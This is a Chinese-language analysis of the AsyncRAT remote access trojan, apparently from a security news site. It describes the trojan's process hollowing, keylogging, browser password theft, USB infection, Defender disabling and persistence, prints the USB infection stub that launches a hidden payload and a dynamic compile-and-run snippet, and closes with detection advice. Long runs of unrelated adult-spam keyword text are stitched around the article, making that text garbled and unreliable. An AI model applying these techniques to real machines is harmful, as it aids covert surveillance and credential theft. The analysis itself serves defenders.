精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

AsyncRAT利用分析

開發
AsyncRAT是一款使用C Sharp開發的C2工具,本文僅在技術研究的角度分析AsyncRAT的技術細節,介紹檢測方法。

[[343203]]

0x01 簡介

· AsyncRAT的優點

· AsyncRAT的技術細節

· 檢測方法

0x02 AsyncRAT的優點

AsyncRAT使用C Sharp開發,應用于Windows系統,具有以下優點:

1. 支持從Pastebin.com讀取C2服務器的配置信息;

2. 支持內存加載PE文件;

3. 支持動態編譯并執行C#或者VB代碼;

4. 支持U盤感染,能夠感染U盤中所有使用.NET開發的exe文件;

5. 支持自動讀取Firefox和Chrome瀏覽器中保存的密碼;

6. 通過欺騙用戶點擊的方式繞過UAC進行提權;

7. 通過C#接口技術,提高程序的擴展性,在程序實現上將每一個功能對應一個類,編譯成dll文件,在需要加載的時候,由Server發送至Client,Client通過Activator.CreateInstance將類實例化,進而調用類的方法。

0x03 AsyncRAT的技術細節

本節按照AsyncRAT控制面板上的功能逐個進行分析,如下圖: 

1.SendFile

(1)ToMemory

內存加載exe文件,支持以下兩種類型:

· Reflection

· 使用Assembly.Load加載C#程序

更多細節可參考之前的文章《從內存加載.NET程序集(Assembly.Load)的利用分析》。

· RunPE

· 通過替換進程內存的方式加載exe文件

可選擇以下程序作為被注入的程序:

· aspnet_compiler.exe

· RegAsm.exe

· MSBuild.exe

· RegSvcs.exe

· vbc.exe

注:

· 以上5個exe文件位于Microsoft.NET Framework的安裝目錄,同AsyncClient.exe的位數保持一致

· 使用32位的AsyncClient.exe反彈回的Session,默認會尋找32位Microsoft.NET Framework的安裝目錄,例如:C:\Windows\Microsoft.NET\Framework\v4.0.30319

· 使用64位的AsyncClient.exe反彈回的Session,默認會尋找64位Microsoft.NET Framework的安裝目錄,例如:C:\Windows\Microsoft.NET\Framework64\v4.0.30319

· RunPE操作將啟動以上5個exe文件中的一個,通過ReadProcessMemory、VirtualAllocEx、WriteProcessMemory和ResumeThread實現對進程內存的修改,替換成要加載的exe文件

· 這里需要注意要加載的exe文件需要同AsyncClient.exe的位數保持一致

· 使用32位的AsyncClient.exe反彈回的Session,使用RunPE操作只能加載32位的exe文件

· 使用64位的AsyncClient.exe反彈回的Session,使用RunPE操作只能加載64位的exe文件

更多細節可參考之前的文章《傀儡進程的實現與檢測》

(2)ToDisk

將exe文件上傳到目標主機的%Temp%目錄,重命名為隨機字符串,再使用Powershell啟動exe文件,執行后不會刪除%Temp%目錄下的exe文件。

2. Monitoring

(1)Remote Desktop

· 監控屏幕,實時獲得目標桌面的內容(只能監控,無法操作)

· 調用Graphics類的CopyFromScreen實現屏幕截圖

通過Python實現監控屏幕的細節可參考之前的文章《Pupy利用分析——Windows平臺下的屏幕控制》。

(2)Keylogger

· 實時獲得目標主機鍵盤輸入的消息和進程名稱

· 通過hook的方式實現鍵盤記錄

(3)Password Recovery

· 獲得Firefox和Chrome瀏覽器中保存的密碼

技術細節可參考之前的文章《滲透技巧——導出Firefox瀏覽器中保存的密碼》和《滲透技巧——導出Chrome瀏覽器中保存的密碼》。

(4)File Manager

· 文件管理,還支持隱蔽安裝7zip和對文件的壓縮及解壓縮

隱蔽安裝7zip的方式:

· 在%Temp%目錄新建文件夾7-Zip,釋放文件7z.exe和7z.dll

(5)Process Manager

· 進程管理,支持查看進程和關閉進程

(6)Report Window

· 監控重要進程,當目標主機上運行指定進程時,控制端彈出提示消息

(7)Webcam

· 開啟攝像頭

3.Miscellaneous

(1)Bots Killer

清除自身進程在注冊表HKLM和HKCU下\Software\Microsoft\Windows\CurrentVersion\Run和Software\Microsoft\Windows\CurrentVersion\RunOnce保存的項。

(2)USB Spread

1. 當目標主機連接U盤時,感染U盤中的文件。

2. 將木馬客戶端復制到U盤中并隱藏,默認保存的名稱為LimeUSB.exe。

修改U盤中所有使用.NET開發的exe文件,通過CSharpCodeProvider改變程序運行流程,添加以下代碼:

  1. using System; 
  2. using System.Diagnostics; 
  3. using System.Reflection; 
  4. using System.Runtime.InteropServices; 
  5.  
  6. [assembly: AssemblyTrademark("%Lime%")] 
  7. [assembly: Guid("%Guid%")] 
  8.  
  9. static class %LimeUSBModule% 
  10.     public static void Main() 
  11.     { 
  12.         try 
  13.         { 
  14.             System.Diagnostics.Process.Start(@"%File%"); 
  15.         } 
  16.         catch { } 
  17.         try 
  18.         { 
  19.             System.Diagnostics.Process.Start(@"%Payload%"); 
  20.         } 
  21.         catch { } 
  22.     } 

用戶在啟動正常文件的同時會隱蔽執行U盤中的木馬客戶端。

(3)Seed Torrent

· 向目標主機發送種子文件并下載

· 目標主機需要安裝uTorrent或者BitTorrent

(4)Remote Shell

· 彈出一個交互式的cmd窗口

(5)DOS Attack

· 向指定域名持續發送HTTP數據包

(6)Execute .NET Code

· 在目標主機上動態編譯C#或者VB代碼并執行

· 模板文件包含彈框和下載執行的功能

我提取出了其中編譯C#代碼并執行的功能,代碼示例如下:

  1. using System; 
  2. using System.CodeDom; 
  3. using System.CodeDom.Compiler; 
  4. using System.Reflection; 
  5. namespace CodeDomProviderTest 
  6.     class Program 
  7.     { 
  8.         static void Main(string[] args) 
  9.         { 
  10.             string source = @" 
  11. using System; 
  12. using System.Windows.Forms; 
  13. namespace AsyncRAT 
  14.     public class Program 
  15.     { 
  16.         public static void Main(string[] args) 
  17.         { 
  18.             try 
  19.             { 
  20.                 MessageBox.Show(""Hello World""); 
  21.             } 
  22.             catch { } 
  23.         } 
  24. }"; 
  25.             CodeDomProvider codeDomProvider = CodeDomProvider.CreateProvider("CSharp");   
  26.             try 
  27.             {               
  28.                 var compilerOptions = "/target:winexe /platform:anycpu /optimize-"
  29.  
  30.                 var compilerParameters = new CompilerParameters(); 
  31.                 compilerParameters.ReferencedAssemblies.Add("system.dll"); 
  32.                 compilerParameters.ReferencedAssemblies.Add("system.windows.forms.dll"); 
  33.                 compilerParameters.GenerateExecutable = true
  34.                 compilerParameters.GenerateInMemory = true
  35.                 compilerParameters.CompilerOptions = compilerOptions; 
  36.                 compilerParameters.TreatWarningsAsErrors = false
  37.                 compilerParameters.IncludeDebugInformation = false
  38.  
  39.                 var compilerResults = codeDomProvider.CompileAssemblyFromSource(compilerParameters, source); 
  40.                 if (compilerResults.Errors.Count > 0) 
  41.                 { 
  42.                     foreach (CompilerError compilerError in compilerResults.Errors) 
  43.                     { 
  44.                         Console.WriteLine(string.Format("{0}\nLine: {1} - Column: {2}\nFile: {3}", compilerError.ErrorText, 
  45.                             compilerError.Line, compilerError.Column, compilerError.FileName)); 
  46.                         break; 
  47.                     } 
  48.                 } 
  49.                 else 
  50.                 { 
  51.                     Assembly assembly = compilerResults.CompiledAssembly; 
  52.                     MethodInfo methodInfo = assembly.EntryPoint; 
  53.                     object injObj = assembly.CreateInstance(methodInfo.Name); 
  54.                     object[] parameters = new object[1]; 
  55.                     if (methodInfo.GetParameters().Length == 0) 
  56.                     { 
  57.                         parameters = null
  58.                     } 
  59.                     methodInfo.Invoke(injObj, parameters); 
  60.                 } 
  61.             } 
  62.             catch (Exception ex) 
  63.             { 
  64.                 Console.WriteLine(ex.Message); 
  65.             } 
  66.         } 
  67.     } 

(7)Files Searcher

· 搜索指定后綴名的文件并打包成zip文件

4.Extra

(1)Visit Website

· 啟動默認瀏覽器并訪問指定URL,界面不隱藏

(2)Send MessageBox

· 在目標主機上彈出對話框

(3)Chat

· 在目標主機上彈出對話框,實時顯示輸入的內容

(4)Get Admin Privileges

1. 使用cmd.exe以Admin權限重新啟動木馬客戶端,這個操作會在用戶桌面彈出UAC框,需要用戶選擇允許后才能運行;

2. 如果用戶未選擇允許,會一直彈出UAC對話框;

3. UAC對話框的程序位置會暴露木馬客戶端的路徑;

4. 如果想要偽造一個更加可信的UAC對話框(不暴露程序位置)可以參考之前文章《A dirty way of tricking users to bypass UAC》中的思路。

(5)Blank Screen

Run功能:

通過WinAPI CreateDesktop()創建一個隨機名稱的虛擬桌面,內容為空,當切換到這個空的虛擬桌面時,用戶無法對桌面進行操作。

Stop功能:

通過WinAPI SwitchDesktop()切換到原來的桌面。

(6)Disable Windows Defender

· 通過修改注冊表的方式關閉Windows Defender,通常在Win10系統上使用

(7)Set Wallpaper

· 設置用戶的桌面

5.Server

· Block Clients

· 拒絕指定IP回連的木馬客戶端

6.Builder

(1)Connection

DNS:指定C2 Server的IP,可以設置多個;

Port:指定C2 Server的端口,可以設置多個;

Pastebin:從Pastebin.com讀取C2 Server的信息,包括DNS和Port。

內容示例:

  1. 127.0.0.1:6606:7707:8808 

(2)Install

1. 用作配置木馬客戶端自啟動的功能;

2. 開啟這個功能后會將木馬客戶端復制到指定位置;

3. 文件名稱可以重新命名;

4. 文件路徑可選擇%AppData%或%Temp%目錄;

5. 當木馬客戶端以普通用戶權限執行時,會在注冊表HKCU\Software\Microsoft\Windows\CurrentVersion\Run添加項,以新的木馬客戶端名稱作為注冊表項的名稱,以新的木馬客戶端路徑作為注冊表項的數據。

當木馬客戶端以管理員權限執行時,會使用schtasks命令創建計劃任務,命令示例:

  1. schtasks /create /f /sc onlogon /rl highest /tn  /tr 

計劃任務的名稱為新的木馬客戶端名稱,會在用戶登錄時執行計劃任務。

(3)Misc

Group:對木馬客戶端進行分類;

Mutex:設置互斥量,避免木馬客戶端的重復啟動;

Anti Analysis:

包括以下功能:

· DetectManufacturer,通過WMI獲得系統信息(Select * from Win32_ComputerSystem),查看Manufacturer是否包含字符VIRTUAL、vmware或VirtualBox

· DetectDebugger,使用WinApi CheckRemoteDebuggerPresent()檢查是否為調試器

· DetectSandboxie,使用WinApi GetModuleHandle()檢查SbieDll.dll是否存在

· IsSmallDisk,檢查硬盤大小是否小于60Gb

· IsXP,檢查系統名稱是否包含字符xp

Process Critica:

將進程設置為保護進程,如果意外關閉了保護進程,那么將導致BSOD。

更多細節可參考之前的文章《結束進程導致BSOD的利用分析》。

Delay:延遲執行的時間

(4)Assembly

· 可以手動設置文件屬性,也可以復制指定文件的文件屬性

(5)Icon

· 設置文件圖標

(6)Build

· Simple Obfuscator:通過重命名的方式實現簡單的混淆

關鍵代碼:

 

  1. private static ModuleDefMD RenamingObfuscation(ModuleDefMD inModule) 
  2.     { 
  3.         ModuleDefMD module = inModule; 
  4.         IRenaming rnm = new NamespacesRenaming(); 
  5.         module = rnm.Rename(module); 
  6.         rnm = new ClassesRenaming(); 
  7.         module = rnm.Rename(module); 
  8.         rnm = new MethodsRenaming(); 
  9.         module = rnm.Rename(module); 
  10.         rnm = new PropertiesRenaming(); 
  11.         module = rnm.Rename(module); 
  12.         rnm = new FieldsRenaming(); 
  13.         module = rnm.Rename(module); 
  14.         return module; 
  15.     } 

0x04 檢測方法

1.查找可疑文件

路徑:%AppData%和%Temp%目錄。

2.使用Autoruns檢查可疑的啟動項

(1)注冊表位置

· HKLM\Software\Microsoft\Windows\CurrentVersion\Run

· HKCU\Software\Microsoft\Windows\CurrentVersion\Run

(2)計劃任務列表

3.后臺可疑進程

· AsyncRAT的木馬客戶端只有exe文件一種形式,在運行時會產生可疑的進程

4.通信流量

· 查看可疑進程對外通信流量

5.使用殺毒軟件

· 目前殺毒軟件均會對AsyncRAT進行攔截

0x05 小結

本文在技術研究的角度分析AsyncRAT的技術細節,介紹檢測方法。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2024-08-06 09:48:49

2023-08-02 08:27:13

2013-03-22 10:00:14

2020-12-25 15:24:24

人工智能

2016-09-29 14:37:39

ImageMagick漏洞分析

2024-09-02 22:51:59

結構化架構模型

2009-02-04 10:30:47

2022-09-27 14:46:03

網絡安全計算機惡意軟件

2009-07-04 21:19:04

2017-08-22 13:45:27

2021-01-20 08:30:00

數據分析機器學習IT

2023-03-09 08:30:34

2017-12-20 09:52:50

2019-02-26 15:15:16

DNS漏洞IP

2010-06-27 17:27:59

新風冷源

2009-11-16 16:43:24

PHP數組刪除

2019-04-02 08:30:03

2024-07-26 21:36:43

點贊
收藏

51CTO技術棧公眾號

亚洲综合小说| 国产精品传媒麻豆hd| www.激情成人| 国产精品极品美女粉嫩高清在线| 欧美精品色婷婷五月综合| 天天操天天干天天操| 美女精品在线| 日韩综合视频在线观看| 18深夜在线观看免费视频| 在线视频cao| 亚洲三级电影网站| 久久av一区二区三区漫画| 在线中文字幕网站| 日韩视频二区| 久热国产精品视频| 少妇久久久久久久久久| 日韩08精品| 91传媒视频在线播放| 国产欧美久久久久| 在线观看国产原创自拍视频| 成人免费视频国产在线观看| 国产欧美精品va在线观看| 日本熟妇成熟毛茸茸| 日韩在线理论| 精品偷拍各种wc美女嘘嘘| 欧美精品色视频| 国产成人精品一区二三区在线观看 | 日韩久久在线| 亚洲黄色在线免费观看| 日本成人中文字幕在线视频| 性欧美在线看片a免费观看| 人妻熟人中文字幕一区二区| 欧美黑人巨大videos精品| 777色狠狠一区二区三区| 国产淫片av片久久久久久| 天堂va在线| 亚洲日本一区二区| 日本一区精品| 欧美人体大胆444www| 成人黄色av网站在线| 亚洲综合在线中文字幕| 一级片在线免费观看视频| 日韩国产欧美三级| 国产97在线视频| 欧美h在线观看| 国产亚洲在线观看| 欧美亚洲一区在线| 久久一区二区三区视频| 国产精品啊啊啊| 欧美久久精品一级黑人c片| 欧美日韩国产黄色| 欧美一级精品片在线看| 亚洲视频日韩精品| 一区二区精品免费| 国产一区二区观看| 亚洲人成电影在线观看天堂色| 亚洲 欧美 日韩系列| 亚洲第一av| 欧美日韩中文字幕| 国产中文字幕二区| 国产乱码精品一区二三赶尸艳谈| 欧美国产1区2区| 日本一区二区三区www| 国产三级电影在线观看| 国产三级三级三级精品8ⅰ区| 国产91色在线|| 老司机精品免费视频| 狠狠综合久久av一区二区蜜桃| 日韩欧美一级在线播放| 五月天婷婷在线观看视频| 亚洲青青久久| 欧美成人性战久久| 精品人妻一区二区三区日产| 欧美一区 二区| 日韩精品久久久久久久玫瑰园| 孩娇小videos精品| 日韩黄色三级| 欧美丰满美乳xxx高潮www| 三级av免费看| 91精品国产自产精品男人的天堂 | 国产亚洲女人久久久久毛片| 久久草视频在线看| yiren22亚洲综合伊人22| 国产精品夫妻自拍| 欧美一级中文字幕| 蜜桃视频在线观看免费视频| 色婷婷av久久久久久久| 国产福利在线免费| 影音先锋欧美激情| 亚洲欧美成人一区二区在线电影| 波多野结衣电影免费观看| 国产精品网站在线看| 国产丝袜高跟一区| 免费黄色激情视频| 激情欧美国产欧美| 国产精品高潮呻吟久久av无限| 国产一国产二国产三| 久久成人精品| 成人欧美一区二区三区黑人孕妇| 精品一区二区无码| 久久99精品久久久久久久久久久久 | 少妇精品一区二区三区| 日本一区二区在线看| 久久高清视频免费| 日韩精品一区二区亚洲av| 男女视频一区二区| 国产精品综合久久久久久| 成年人在线观看网站| 夜夜嗨av一区二区三区四季av| 潘金莲一级淫片aaaaa免费看| 国产一级片在线播放| 亚洲精品乱码久久久久久久久 | 亚洲成av人片在线观看| 国产精品69页| 日韩免费高清视频网站| 亚洲午夜国产成人av电影男同| 少妇精品一区二区三区| 久久福利综合| 6080yy精品一区二区三区| 91精东传媒理伦片在线观看| 91亚洲国产成人精品一区二区三 | 久久久久久久片| 激情久久免费视频| 伊人精品在线观看| 国产在线欧美在线| 狠狠v欧美v日韩v亚洲ⅴ| 欧美黑人3p| 国产在线xxx| 3d动漫精品啪啪1区2区免费| 欧美做受高潮6| 亚洲作爱视频| 国产精品美女久久久久av福利| 亚洲va天堂va欧美ⅴa在线| 国产精品色在线| www一区二区www免费| 午夜久久av| 久久中国妇女中文字幕| 中文字幕欧美人妻精品一区蜜臀| 久久国产综合精品| 久久国产一区| 9999精品成人免费毛片在线看 | 久久综合网hezyo| 中文字幕精品无码一区二区| 高清在线观看日韩| 欧美日韩中文字幕在线播放| 亚洲福利影视| 夜夜嗨av一区二区三区四区| 色av性av丰满av| 久久在线观看免费| 97国产精东麻豆人妻电影| 九九热hot精品视频在线播放| 亚洲欧美成人网| 国产无套丰满白嫩对白| 99re热这里只有精品视频| 欧美久久久久久久久久久久久久| 三妻四妾的电影电视剧在线观看| 在线观看中文字幕不卡| 白丝女仆被免费网站| 性感少妇一区| 日韩欧美亚洲精品| 国产精品99精品一区二区三区∴| 日韩欧美国产精品| 欧美激情精品久久| 国产在线视频不卡二| 天堂av免费看| 日韩免费一级| 久久久这里只有精品视频| 天天干,夜夜爽| 欧美网站在线观看| 国产精品免费无码| 久久精品国产精品亚洲综合| 最新中文字幕久久| 91精品入口| 1769国内精品视频在线播放| 日韩av男人天堂| 国产美女撒尿一区二区| 久久久久久九九九| 亚洲av电影一区| 欧美性开放视频| 无码少妇一区二区| 另类人妖一区二区av| 免费国产成人看片在线| 中文字幕一区二区三区日韩精品| 亚洲国产天堂网精品网站| 久久草视频在线| 国产亚洲精品bt天堂精选| 国产精品入口免费软件| 国产精品成人a在线观看| 97人人模人人爽人人少妇| 是的av在线| 色偷偷9999www| 精品黑人一区二区三区在线观看 | 偷拍夫妻性生活| 免费在线欧美视频| 成人区一区二区| 蜜乳av综合| 91国产在线播放| 99热99re6国产在线播放| 亚洲最新视频在线| 亚洲爆乳无码一区二区三区| 91福利精品视频| 久久伊人成人网| 国产日本欧洲亚洲| 亚洲视频天天射| 老妇喷水一区二区三区| 超级碰在线观看| 免费久久精品| 99九九视频| 国产精品99久久久久久董美香| 中文字幕日韩欧美在线| 亚洲精品一区二区口爆| 欧美性少妇18aaaa视频| 少妇久久久久久被弄高潮| 国产夜色精品一区二区av| 女人扒开腿免费视频app| 日韩在线播放一区二区| 免费高清一区二区三区| 日韩精品欧美| 欧美日韩一区综合| 成人在线视频你懂的| 成人a免费视频| 欧美特大特白屁股xxxx| 欧美精品videos| 最新日本在线观看| 中文字幕在线观看亚洲| 你懂的视频在线| 亚洲国产成人久久综合| 精品国产亚洲av麻豆| 欧美日韩亚洲综合在线| 9i精品福利一区二区三区| 洋洋av久久久久久久一区| 精品手机在线视频| 国产亚洲一区字幕| 久久久久国产精品区片区无码| 日韩成人一级片| 国产91xxx| 欧美 日韩 国产 一区| 亚洲看片网站| 凹凸成人精品亚洲精品密奴| 欧美伦理一区二区| 婷婷国产精品| 国产伦精品一区二区三区在线 | 国产精品久久久久久亚洲影视| 在线激情网站| 亚洲一区二区久久久| 蜜桃成人在线视频| 精品视频—区二区三区免费| 天天躁日日躁狠狠躁喷水| 亚洲电影第1页| 亚洲欧美另类综合| 精品国产污污免费网站入口| 性欧美8khd高清极品| 欧美一区二区视频在线观看| 国产一区二区女内射| 欧美精品第1页| 国产精品一区二区三区在线免费观看 | 欧美猛男超大videosgay| 无码免费一区二区三区| 91福利在线导航| 中文字幕一区二区久久人妻| 欧美色网站导航| 亚洲一卡二卡在线观看| 欧美猛男gaygay网站| 国产高清第一页| 欧美变态口味重另类| 人妻va精品va欧美va| 日韩电影免费观看中文字幕| 天堂在线一二区| 亚洲视频在线观看视频| √新版天堂资源在线资源| 精品国产一区二区三区久久久狼 | 不卡区在线中文字幕| 中文字幕乱码一区| 久久这里都是精品| 女教师淫辱の教室蜜臀av软件| a级高清视频欧美日韩| 精品综合久久久久| 成人午夜短视频| 国产激情在线免费观看| 国产精品久久久久一区二区三区共| 中文字幕在线观看网址| 日本一二三不卡| 三级黄色录像视频| 亚洲国产日韩a在线播放| 五月激情六月丁香| 欧美日本一区二区三区四区| 性生活视频软件| 亚洲欧美激情四射在线日| 欧洲不卡av| 国内精品久久久久久久久| 黄瓜视频成人app免费| 91精品中国老女人| 欧美黑白配在线| 国产精品亚洲天堂| aa级大片欧美三级| 污污视频网站在线| 99国产精品国产精品久久| 黄色免费一级视频| 亚洲va欧美va天堂v国产综合| 久久精品免费在线| 欧美亚洲尤物久久| 亚洲精品一区二区三区不卡| 永久免费看mv网站入口亚洲| 任你弄在线视频免费观看| 国产精品高潮呻吟视频| 91成人在线精品视频| 香蕉久久夜色| 国产一区二区三区成人欧美日韩在线观看 | 1769国产精品| 精品视频91| 视频一区亚洲| 激情久久久久久| www.久久av.com| 国产日韩欧美综合一区| 日韩激情一区二区三区| 欧美日本高清视频在线观看| 你懂的视频在线| 午夜精品久久久久久久99热浪潮| 波多野结衣久久| 91精品国产综合久久男男| 窝窝社区一区二区| 97中文字幕在线| 久久99精品久久只有精品| 欧美成人午夜精品免费| 亚洲国产毛片aaaaa无费看| 国产精品高潮呻吟AV无码| 亚洲欧美三级伦理| 男女羞羞在线观看| 国产麻豆乱码精品一区二区三区| 台湾佬综合网| 毛片av在线播放| 国产一区福利在线| 国产馆在线观看| 91精品福利视频| 亚洲 另类 春色 国产| 欧美日韩999| 日本一区二区三区播放| 夜夜爽99久久国产综合精品女不卡| 欧美成人午夜| 超碰在线资源站| 国产精品嫩草影院com| 成年人av网站| 亚洲欧美激情四射在线日| gay欧美网站| 蜜桃精品久久久久久久免费影院| 大片网站久久| 亚洲成人av免费看| 国产精品私房写真福利视频| 波多野结衣毛片| 亚洲网站在线播放| 99久久er| 亚洲丰满在线| 麻豆久久一区二区| 国精产品一区一区二区三区mba| 偷拍一区二区三区四区| 午夜视频免费看| 青青草国产精品一区二区| 免费成人高清在线视频theav| 最新国产精品久久| 国内精品在线播放| 日本在线一级片| 日韩免费看网站| av丝袜在线| 美女精品国产| 免费久久99精品国产| 四虎影院中文字幕| 日韩欧美成人午夜| yellow字幕网在线| 欧美精品一区二区三区久久| 久久久久国产精品午夜一区| 欧美激情 一区| 欧美二区乱c少妇| 麻豆福利在线观看| 欧美日韩精品不卡| 蜜臀a∨国产成人精品| 国产探花在线免费观看| 亚洲成色999久久网站| 美女18一级毛片一品久道久久综合| 成人在线观看网址| 亚洲主播在线| 手机免费观看av| 日韩精品在线一区二区| 五月天av在线| 亚洲一区二区三区色| 国产盗摄视频一区二区三区| 中日韩黄色大片| 最近2019中文字幕mv免费看| 51vv免费精品视频一区二区| 亚洲国产精品久久久久爰色欲| 国产成人精品免费在线| 亚洲伊人成人网| 久久天天躁狠狠躁夜夜爽蜜月| 日韩一区二区三区免费视频| 水蜜桃在线免费观看| 91麻豆国产在线观看| 亚洲天堂国产精品| 性欧美xxxx| 91精品精品| 白丝女仆被免费网站| 日韩欧美国产电影|